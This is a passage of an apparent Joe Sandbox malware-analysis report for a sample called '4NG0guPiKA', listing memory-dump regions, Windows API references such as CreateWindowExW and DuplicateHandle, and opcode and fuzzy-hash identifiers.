d5256-d5258 2430->2436 2432->2425 2433->2425 2435->2425 2436->2425 2440 d529b-d529d 2437->2440 2438->2440 2444 d529f-d52a1 2440->2444 2445 d52a3-d52a5 2440->2445 2444->2425 2446 d52ae 2445->2446 2447 d52a7-d52ac 2445->2447 2446->2425 2447->2425 2454->2367 2455->2367 2456->2392 2457->2392 2458->2382 2459->2382
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: Hq$Hq
• API String ID: 0-925789375
• Opcode ID: 41e601d0e0ae2bd1fc7ac147b02974797fc551bddfb98cf4683a8119145dde32
• Instruction ID: 9cca9271e94d350c3b86b2fd7fcce1f8598d390647e451a4b0baeadc24f669c9
• Opcode Fuzzy Hash: 41e601d0e0ae2bd1fc7ac147b02974797fc551bddfb98cf4683a8119145dde32
• Instruction Fuzzy Hash: 55B1AB307047508FEB259F34C858B7E7BE2AB89341F14856AE846CB7A5DB78CC41DBA1

Control-flow Graph
(Control-flow graph rendering omitted: basic-block edge list beginning at d5460, with executed / not-executed block colouring.)
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: ,q$,q
• API String ID: 0-1667412543
• Opcode ID: bbaa9313df0f7767c21b5b5a075dc9105793c08252369433ac8521215785e78f
• Instruction ID: 0d1039bcc519ec0e85d5bc8c1541be165d02839dd8b37a815a0caf6a78bad45e
• Opcode Fuzzy Hash: bbaa9313df0f7767c21b5b5a075dc9105793c08252369433ac8521215785e78f
• Instruction Fuzzy Hash: 12818134A00A058FCB54CF69CC949AEB7F2BF88316B65816AD805DB365DB31EC41CFA1
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: LRq$\'!3
• API String ID: 0-3664120778
• Opcode ID: 7e468d4d085456e38d63350e1431a35dc805197285090b2d175c14adb0cba39c
• Instruction ID: 8d7fdc1a21068386171b72758b14953eb2e3f89c175fa59b3955b55fe33a5612
• Opcode Fuzzy Hash: 7e468d4d085456e38d63350e1431a35dc805197285090b2d175c14adb0cba39c
• Instruction Fuzzy Hash: 9BA1A974A00349DFDB04DFA8D888A9DBBB2FB4C701B108229E405BB365DB74A946CF95
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: LRq$\'!3
• API String ID: 0-3664120778
• Opcode ID: 09407aab73a7875f37fa18dd9fb3970bdbbcc4be04b07735869359e3caed0b2e
• Instruction ID: af7c4dfa7a253d99494d7bc921f9dd2c5a1ef5b876ba2df10118e170db25596e
• Opcode Fuzzy Hash: 09407aab73a7875f37fa18dd9fb3970bdbbcc4be04b07735869359e3caed0b2e
• Instruction Fuzzy Hash: 6AA1A874A00349DFDB04DFA8D888A9DBBB2FB4C701B108225E405B7365DB74A946CF95
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q
• API String ID: 0-1467158625
• Opcode ID: eb54a8cd55b79c2e232bc1e6e1bcfb13f9eeea10c46632b69c4a1ef05a69abd9
• Instruction ID: 5d6bfc505c8777da8cba2636433ef25021f6a5fb03a01adec67710736089b405
• Opcode Fuzzy Hash: eb54a8cd55b79c2e232bc1e6e1bcfb13f9eeea10c46632b69c4a1ef05a69abd9
• Instruction Fuzzy Hash: 6B518C307153449FEB00DB69C840BAA7BE6EF89350F14C466E905CB3A2DB75DD01DB61
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36450222
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: b3bb385c4e718122bed5da4cc7b7c166df7a728917b4ee79448b1b0dd5427694
• Instruction ID: aea5bb54ea070f52b6229d9af6030cc10c3427e97f514f0c8dffd1c743b821cd
• Opcode Fuzzy Hash: b3bb385c4e718122bed5da4cc7b7c166df7a728917b4ee79448b1b0dd5427694
• Instruction Fuzzy Hash: AE51D0B5D10348DFDB15CFA9C880ADEBFB1BF48310F20812AE818AB210D775A841CF91
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36450222
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: fc93182e728d09b9357ae48166410ffa1d45bf3a827faa9d6ed9119640448716
• Instruction ID: c829028aa9015e0e24c5ed14d1cda37913f8acdbfa79881ea5ac76a1b236bcb3
• Opcode Fuzzy Hash: fc93182e728d09b9357ae48166410ffa1d45bf3a827faa9d6ed9119640448716
• Instruction Fuzzy Hash: 7241C0B5D10349DFDB15CF9AC880ADEBBB5BF48710F24812AE918AB210D775A841CF91
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 36451E81
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 9ad1ee46657704e258dc65480488327664f631dca77688128e56995393dd8ffa
• Instruction ID: 11421b41ee00a3f6740b4c9b56c5893acfe23c748959258700d4be3764525268
• Opcode Fuzzy Hash: 9ad1ee46657704e258dc65480488327664f631dca77688128e56995393dd8ffa
• Instruction Fuzzy Hash: C34117B8D00349CFDB14CF95C484A9ABBF5FF89314F25C959D619AB321C774A841CBA0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36450C4F
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: eb3970b707ed5794b2cf6e3eb315de7e9377d45eb9ff5884da6100d7694b417a
• Instruction ID: dcbc893b2369b3b189f5ceed00dbd4bb88dcc791f3ca6cfe7ed954e6e20b1984
• Opcode Fuzzy Hash: eb3970b707ed5794b2cf6e3eb315de7e9377d45eb9ff5884da6100d7694b417a
• Instruction Fuzzy Hash: 9F21E5B5D002489FDB10CFAAD984ADEBBF4EB48310F14841AE954A7310D374A940CFA5
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36450C4F
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 14ee5ea1ae4f648bc11d301416a6d5f621e31130c78e9b30f25e4d15a89a05d3
• Instruction ID: d75b533766d38dd4dab91864ad5eb0e2f139c2f45654be8866f5830c09dd63e0
• Opcode Fuzzy Hash: 14ee5ea1ae4f648bc11d301416a6d5f621e31130c78e9b30f25e4d15a89a05d3
• Instruction Fuzzy Hash: 6121C4B5D003489FDB11CFAAD984ADEBBF4EB49320F14841AE958A7310D374A940CF65
APIs
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: Timer
• String ID:
• API String ID: 2870079774-0
• Opcode ID: dfd5e2d65172cfa0b8abd9639376b0e19d0d26e05c547c4d4c24c24a2cd132c3
• Instruction ID: 3672f067ab4a8dc7e983ea6fed18b2beff9b1fc7fdffe225dda0d8c0483776c6
• Opcode Fuzzy Hash: dfd5e2d65172cfa0b8abd9639376b0e19d0d26e05c547c4d4c24c24a2cd132c3
• Instruction Fuzzy Hash: E911F5B5800349DFDB20CF9AC485BDEBBF4EB49720F10841AD959A7210C375A984CFA5
APIs
• OleInitialize.OLE32(00000000), ref: 3645D525
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: bfab207aafaadb49436bc50850c7aa667a51f2589076390c631106d3fb34b67c
• Instruction ID: 79816f9beb9bc781d2689cc713ccae284691cb8022595f82f4aabc3d1f99a871
• Opcode Fuzzy Hash: bfab207aafaadb49436bc50850c7aa667a51f2589076390c631106d3fb34b67c
• Instruction Fuzzy Hash: E61133B1D04348CFDB20CFAAD545B9EBBF4EF48224F108459D618A7200C374A940CFA9
APIs
• DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3645DA0F), ref: 3645E845
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: b7152ba40189206da87a5aa82d64339031b1229d86da03e2eaf83456bfcf23c2
• Instruction ID: 29abea8dc5a7e4d29753c8f7d6785427dc7b22b5509dfe84d8c3d3d7fa551d06
• Opcode Fuzzy Hash: b7152ba40189206da87a5aa82d64339031b1229d86da03e2eaf83456bfcf23c2
• Instruction Fuzzy Hash: A71110B1C04748CFDB20CF9AD444B9EFBF4EB48324F10842AE518A7210C378A540CFA5
APIs
• OleInitialize.OLE32(00000000), ref: 3645D525
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: f9c79d82aede8ea40f308a5d92261ccfec64de9bcc19afa84aea1fca7e1af6ca
• Instruction ID: 7d107dcd55c27a7766dbfe761516f2cb2dd1e3d7c5f695ec59f13fa20301c7b6
• Opcode Fuzzy Hash: f9c79d82aede8ea40f308a5d92261ccfec64de9bcc19afa84aea1fca7e1af6ca
• Instruction Fuzzy Hash: 7A1103B5D003488FDB20CFAAD545BDEBBF4EB48224F20845AD559A7210C378A944CFA5
APIs
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: Timer
• String ID:
• API String ID: 2870079774-0
• Opcode ID: 408ad6d1583cb8ae5e509aeb748905d2e0f652801a8dbce8a9c99988ea6177ac
• Instruction ID: f1437b8d7b0cdce6271f469e015ea77335aac4e8a1614b23a8e42a2bac9bfbaf
• Opcode Fuzzy Hash: 408ad6d1583cb8ae5e509aeb748905d2e0f652801a8dbce8a9c99988ea6177ac
• Instruction Fuzzy Hash: 0C11D3B5800349DFDB20CF9AD845BDEBBF8EB49720F10841ADA59A7210C375A984CFA5
APIs
• DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3645DA0F), ref: 3645E845
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: 3d928fd643980c6ee2d26ac3314676c5c9a94f6ce8b5dd5b6152f9cb973fe5b5
                                                                                                            • Instruction ID: b8fa05bbb78a7ddc563a53d97674f254b624f8732a1b73c9cbf5bc50679900da
                                                                                                            • Opcode Fuzzy Hash: 3d928fd643980c6ee2d26ac3314676c5c9a94f6ce8b5dd5b6152f9cb973fe5b5
                                                                                                            • Instruction Fuzzy Hash: F5111DB5C00289CFCB20CFAAD540BDEFBF4AB08224F10851AD568A7210C338A541CFA6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq
                                                                                                            • API String ID: 0-1999159160
                                                                                                            • Opcode ID: 6c441c15472dbbcb48430ec904e58071101650470daea0b264ce6d5fb9c8f3ea
                                                                                                            • Instruction ID: 50cc763c43ae2042e097c6836a7e8f7db88b17354224ec648d161d9623c83c86
                                                                                                            • Opcode Fuzzy Hash: 6c441c15472dbbcb48430ec904e58071101650470daea0b264ce6d5fb9c8f3ea
                                                                                                            • Instruction Fuzzy Hash: 2A41D032B042049FDB15AB75D815AEE7BF6AFCD310F18406AE906D77A1DE359C01CBA1
                                                                                                            Strings
                                                                                                            • 8K$3DK$3PK$3\K$3hK$3K$3, xrefs: 000D4640
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8K$3DK$3PK$3\K$3hK$3K$3
                                                                                                            • API String ID: 0-743523151
                                                                                                            • Opcode ID: dda28354ecfdf93c84966a9af51bc74f3daec11d96f6ae6266dc2112587b5613
                                                                                                            • Instruction ID: 8aea1dc3ab440fc8c00ab3311007f8f2455cf81b728708d6e489dee316fbe0d8
                                                                                                            • Opcode Fuzzy Hash: dda28354ecfdf93c84966a9af51bc74f3daec11d96f6ae6266dc2112587b5613
                                                                                                            • Instruction Fuzzy Hash: AB31B431304209AFCF059F64D854ABE3BA2EB89300F148025F9169B765CF39DE21EFA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: X\$30a$3
                                                                                                            • API String ID: 0-2318330025
                                                                                                            • Opcode ID: a43599221e7832d9fd0d90ecf7b68502092ff1e3892116cb150a146419f2cda0
                                                                                                            • Instruction ID: 299d90345ce159f39592126fe452fe4982b8633bf580a8b2d1b3d18d03e3fd53
                                                                                                            • Opcode Fuzzy Hash: a43599221e7832d9fd0d90ecf7b68502092ff1e3892116cb150a146419f2cda0
                                                                                                            • Instruction Fuzzy Hash: 52216930A0524C9FDB15CFA5D940AEEBFB6EF48305F24806AE415B63A0DB34E941EF60
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PK$3\K$3hK$3K$3
                                                                                                            • API String ID: 0-704815058
                                                                                                            • Opcode ID: d633742fe4de6bd18ed9d8de61d2a9d43f5dc13bacabe98b1f3fd845aeafccb5
                                                                                                            • Instruction ID: a00286ac28244a4288c3b4820d1159293fb1dea03ada232e571fa5d82984e76a
                                                                                                            • Opcode Fuzzy Hash: d633742fe4de6bd18ed9d8de61d2a9d43f5dc13bacabe98b1f3fd845aeafccb5
                                                                                                            • Instruction Fuzzy Hash: F601D436304204AFCB055F64D8545BD7BA2EF49300714803AF9068A765DB39CE12EFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b8a661b28f599d1c5d5b19fc6fc478e17a2d4509d41d9e376e82b72177d4858f
                                                                                                            • Instruction ID: 750861d1c751cbd7af0d29e25819f6b0c150e34e07c5df671078d55a0a1a4fe4
                                                                                                            • Opcode Fuzzy Hash: b8a661b28f599d1c5d5b19fc6fc478e17a2d4509d41d9e376e82b72177d4858f
                                                                                                            • Instruction Fuzzy Hash: 6DE1E674A00258DFEB25DF64C858BADBBB6FB89300F1085A9D80A77350CB759E82DF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aaf79e34dbf2fd7867b78a78562ff96af26dd4d8cebae36cfbbc5ef0e3b9738f
                                                                                                            • Instruction ID: ee72e9661d4203b3694b33587a7afd39743409179e5fe9eb5f4f4b2e5d1d102a
                                                                                                            • Opcode Fuzzy Hash: aaf79e34dbf2fd7867b78a78562ff96af26dd4d8cebae36cfbbc5ef0e3b9738f
                                                                                                            • Instruction Fuzzy Hash: 00E1E774A00258DFDB25DF64C858BADBBB6FB89300F1085A9D80A77350CB759E82DF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5486aeef6f3952681dff0759a7f415c777abe35f982f9f991852fdef13d2d38a
                                                                                                            • Instruction ID: 8f5bb5762c6cd20529b03a4fc0d0f1a1fddd10f6474d764f82261d9dd7475d26
                                                                                                            • Opcode Fuzzy Hash: 5486aeef6f3952681dff0759a7f415c777abe35f982f9f991852fdef13d2d38a
                                                                                                            • Instruction Fuzzy Hash: B77119347003058FDB54DF28C894A6E7BE6AF59700F1944A6E806CB3B1DB76EC41DBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 13e324357b0d46e25ac424064b03d7073309cbbc2fa10bc368400e9d05906fd8
                                                                                                            • Instruction ID: 0de277c633bcbb08e8394e6884366959fe9805124a034b6c2085037171028f7d
                                                                                                            • Opcode Fuzzy Hash: 13e324357b0d46e25ac424064b03d7073309cbbc2fa10bc368400e9d05906fd8
                                                                                                            • Instruction Fuzzy Hash: AA71FA75E003198FDB09EFB5C858AADBBF2FF88700F108629D406AB254DB799952CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 43581e5844dc3d2551402150a0ed80f1b8f741209951ddcfc7e6f42500b58e67
                                                                                                            • Instruction ID: 01c9a6489139d5b42c502ed11617532566b908d060ab0b22aa07bf34beec2fe6
                                                                                                            • Opcode Fuzzy Hash: 43581e5844dc3d2551402150a0ed80f1b8f741209951ddcfc7e6f42500b58e67
                                                                                                            • Instruction Fuzzy Hash: 4551AE74D01318DFDB14DFA5C854BAEBBB2BB88300F608629D805BB255DB759986CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 12422213520568cf345c16bb01d94ea60aaa1cadc82043b5f286e5bfb52fce7d
                                                                                                            • Instruction ID: e65748616f8b1e0907ce3008bbbeaae369c2cc11fd60ad533ead0db6b4f6c612
                                                                                                            • Opcode Fuzzy Hash: 12422213520568cf345c16bb01d94ea60aaa1cadc82043b5f286e5bfb52fce7d
                                                                                                            • Instruction Fuzzy Hash: AD518274E002589FDB54DFA9C894ADDBBB2FF89300F248169D809BB355DB31A946CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e544dc4114c5f06fed29a7592be2b5b68e6293463a65880e99a7e2a9ade3c9da
                                                                                                            • Instruction ID: a16d007bdc10d5bc12abbc2f623284b6a8f5b454b817b6afc3f48df5df8b5487
                                                                                                            • Opcode Fuzzy Hash: e544dc4114c5f06fed29a7592be2b5b68e6293463a65880e99a7e2a9ade3c9da
                                                                                                            • Instruction Fuzzy Hash: 1D517E74E01308DFCB48DFA9D58499DBBB2FF89300B208569E809BB365DB35A942CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d1ff24af585a1cd85ed3687c746611260ac40041aa80bc3bafd68a8aef39ad8
                                                                                                            • Instruction ID: ad362e4c9ca0b0eca0b00304d04ba6f1d1865d9b34e66f2564d503c0957841e0
                                                                                                            • Opcode Fuzzy Hash: 3d1ff24af585a1cd85ed3687c746611260ac40041aa80bc3bafd68a8aef39ad8
                                                                                                            • Instruction Fuzzy Hash: D441BE31A04349DFCF15CFA4C844AEDBFB2AF89350F148156E805AB3A2D334E955DBA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4fc479274361da8c1fade2e66b5d32ec731925fa02cb2182ff70ae25dd0c9b0
                                                                                                            • Instruction ID: 0cbeeced8299dcd8ea27f09b4a07ac9a456621e9d99f10c127757521f3fe5319
                                                                                                            • Opcode Fuzzy Hash: b4fc479274361da8c1fade2e66b5d32ec731925fa02cb2182ff70ae25dd0c9b0
                                                                                                            • Instruction Fuzzy Hash: 503192F8A053158FEB18CF65C4507AEBBF66F88740F15882DD442EB280DB74A946CBA1
                                                                                                            Memory Dump Source
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1edec849554aaefcbda819dd56c6e5c5bca552bccd461f2c051455b14ee4d236
                                                                                                            • Instruction ID: a55d246f1d34f0de8f725d55dd41c343843ea4b58484b09d6894757f6492debd
                                                                                                            • Opcode Fuzzy Hash: 1edec849554aaefcbda819dd56c6e5c5bca552bccd461f2c051455b14ee4d236
                                                                                                            • Instruction Fuzzy Hash: 50018C317006018FD314DF6EC491E1AB7F6FF897543058A6AE00ACB721DB70EC869B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 68c100ea2174d21e27e56d73e38acf482255e2a0416d65fd37ad903ae45d6123
                                                                                                            • Instruction ID: 9b7824b5936884dc17a1bf6027869d47fe9e15f932349e8c2060508bbb228cdf
                                                                                                            • Opcode Fuzzy Hash: 68c100ea2174d21e27e56d73e38acf482255e2a0416d65fd37ad903ae45d6123
                                                                                                            • Instruction Fuzzy Hash: C901D631B003188BDB18AB798858B3E76DBAFC4760315453AD905C7324FF74CD0097A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1e1bb0d405a25cface7184a7ca3d1d89bc5d9a9505758fa1adf6f30cd8e75cb2
                                                                                                            • Instruction ID: 5ef2aea11486011312b732f08293d6d9797e215597742410e923fb3d339dfaf4
                                                                                                            • Opcode Fuzzy Hash: 1e1bb0d405a25cface7184a7ca3d1d89bc5d9a9505758fa1adf6f30cd8e75cb2
                                                                                                            • Instruction Fuzzy Hash: 64018B78E01605CFDB00DFB9C8446EDBBB5EB8A301F50A869C405B3261CB369841CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f9037a5ecfbf6c864eb8b4afc9afd533654c8e947db6bf53c7e548ff01b2dd1
                                                                                                            • Instruction ID: 7fbd65b855accc00ba0ce3224a9987009eaa17856daa0f6e7a7a94bcaa4024f3
                                                                                                            • Opcode Fuzzy Hash: 8f9037a5ecfbf6c864eb8b4afc9afd533654c8e947db6bf53c7e548ff01b2dd1
